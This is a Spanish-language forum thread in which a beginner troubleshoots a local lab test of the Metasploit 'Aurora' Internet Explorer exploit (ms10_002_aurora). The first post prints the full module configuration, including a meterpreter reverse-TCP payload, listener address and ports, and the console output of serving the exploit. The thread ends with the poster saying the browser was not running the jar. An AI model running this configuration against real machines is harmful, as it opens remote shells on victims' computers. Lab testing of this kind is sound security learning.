Problema con exploit ms10_002_aurora

Iniciado por chema002, 6 Agosto 2016, 17:28 PM

0 Miembros y 1 Visitante están viendo este tema.

chema002

Buenas tardes a todos,

Tengo un problema al ejecutar el exploit indicado del asunto. Estoy haciendo pruebas en local con una máquina virtual, en mi linux el server queda esperando y en la vm ejecuto la url en el navegador.

Tengo abierto el puerto 8001.

Antes de ejecutar 192.168.0.102:8080 tengo la consola "started":


resource (/root/.set/meta_config)> use windows/browser/ms10_002_aurora
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp_dns
PAYLOAD => windows/meterpreter/reverse_tcp_dns
resource (/root/.set/meta_config)> set LHOST 192.168.0.102
LHOST => 192.168.0.102
resource (/root/.set/meta_config)> set LPORT 8001
LPORT => 8001
resource (/root/.set/meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
  • Exploit running as background job.

  • Started reverse TCP handler on 192.168.0.102:8001
    msf exploit(ms10_002_aurora) >
  • Using URL: http://0.0.0.0:8080/
  • Local IP: http://192.168.0.102:8080/
  • Server started.



    Después de ejecutar:


  • 192.168.0.102    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
  • 192.168.0.102    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption

    Busco sesiones activas y nada:

    msf exploit(ms10_002_aurora) > sessions -i

    Active sessions
    ===============

    No active sessions.



    ¿Alguien me puede ayudar? Os comento que en el tema de exploit soy un poco novato, estoy leyendo mucho y empapandome de todo, por eso lo de mis pruebas locales.

    Gracias a todos!!

    Saludos.


chema002

Buenas tardes,

me contesto a mi mismo, el tema era que el navegador del cliente no estaba ejecutando correctamente el jar.

Tema solucionado.

berz3k


Hello
Pero finalmente te funciono el exploit? postea detalles please

-berz3k